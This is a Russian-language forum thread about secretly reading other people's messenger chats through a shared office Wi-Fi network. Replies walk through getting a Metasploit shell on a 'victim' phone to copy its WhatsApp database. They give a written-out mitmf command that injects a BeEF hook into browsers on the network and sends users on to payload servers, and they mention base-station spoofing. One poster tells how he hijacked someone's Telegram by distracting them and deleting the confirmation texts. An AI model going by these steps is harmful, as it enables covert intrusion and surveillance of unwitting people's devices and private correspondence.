Доступ к телефонам через офисный вайфай

Расскажите чайнику, реально ли получить доступ к телефонам, переписке в Вотсап, подключенным к офисному вайфай? Много программ в интернет. Не скачиваются, не работают, и т.д.

 

1.Ставшь на комп Метасплойт например.
2. Получаешь по средствам MS шел на телефоне жертвы.
3. Утаскиваешь из папки: sdcard/WhatsApp/Databases файл msgstore.db - там вся переписка.
4. ???
5. Profit.

 

P.S.
Перехват переписки Wpatsapp по средствам MiTM в сети WiFi не возжен , ибо шифрование.

 

Для чайника непонятно)) компом пользоваться не буду. Своим телефоном . Так это не реально?
А взлом Вк с такими же исходными данными, подключением к одному вайфай тоже не реален?

 

Для чайников есть 100500 видео на ютубе.
Метасплойт при желании можно и на смартфоне/планшете поднять.
По ВК раньше можно было MiTM реализовать , сейчас все в ssl заворачиваетя вроде.

 

Чушь собачья на Ютубе. Есть некий sniffer
Но он не устанавливается

 

Нажатием одной кнопки в одной программе по вашей теме сломать точно ничего не получится

 

можно установить термукс на андроид.в нем установить метасплоит и в локальной сети сможешь угонять все что тебе угодно. митм атаки,сниффинг и тп доступны 24/7 в локалках.(кроме айфонов)

 

Где-то года 2 назад читал, что имея доступ к роутеру можно настроить перенаправление всеx пользователей на http протокол в обход https, вот только на практике проверить все руки не доходили. Раньше вк был доступен по http, если вбить вручную адрес.

 

Ещё есть интерсептор, но под него тоже нужен експлойт, чтобы вытащить данные. И вообще с ведроидом как он взаимодействует - вопрос

 

Viber переписку возможно получить такими методами ?

 

Добрый день, прошу помощи новичку, если не трудно в данном вопросе. Также изучаю тему получения доступа к файловой системе Андроидов и в поиске по форуму наткнулся на здешнее сообщение, где предлагается использовать Метасплоит и получение по средствам MS шела на соответствующем телефоне, и возник вопрос, как можно установить пейлоад на целевое устройство, созданный msfvenom без вот такого явного участия собственника телефона (т.е. без явного привлечения методов социальной инженерии, или же как это сделать незаметно) в той же Wifi сети. Есть ли иной способ проникнуть на телефон?

 

1. Подними сервер beef
2. Подними с помощью msf какой то пассивный сплойт(под мобильные устройства), или можешь поднять несколько, и далее редиректить их с одного сервера(msf) на другой(если один не сработал то на другой итд)
3. Запусти mitmf.py -i wlan0--inject --spoof --js-url http://beef:3000/hook.js и жди...
4. Как только увидишь что подцепил браузер запускай кидай юзеру событие в браузер по клику на которое он будет перенаправлен на твои сервера msf.

ps: Надеюсь что сам ход мысли понятен, реализовать желаемое можно многими способами, в теории можно заглушить 3g/4g и на osmocom поднять свою BTS и переподключить все девайсы к ней, и далее уже с помощью соц. инженерии(и не только) пытаться реализовать задуманное.

 

Спасибо, а можете пояснить плез как сервера с msf развернуть, гуглил msf server, но похоже не корректно задаю вопрос. Или надо в лоб все делать т.е. для примера перенаправлять, когда юзер нажал на beef-событие из браузера, на мой апач сервис, где у меня грубо говоря написано для примера "Hello World, скачайте payload" со ссылкой на апк файл для скачивания?

Эти пункты очень интересуют

 

Есть вообще вероятность прочитать переписку в чужом Telegram?

 

Ответ на эти пункты должен включать полное объяснение как пользоваться данными инструментами. Наберите в гугле просто 'metasploit how to hack browser' и я вам даю гарантию в 99% что там будет информация.

юзер кликнул на красивое окошло которое у него всплыло, и автоматом отправился на ваш msf сервер, в результате чего в него был загружен и выполнен payload(какой уже решать вам) и вы получили на своей стороне сессию. Далее эту схему уже можно автоматизировать и улучшать....

 

я делал так, отвлекал жертву чтоб она была занята далеко от телефона, с ее номера заходил в веб версию телеги, подтверждал вход с ее телефона, смс с подтвержденями удалял, вуаля - есть доступ

 

Без доступа к гаджету это ничего не получится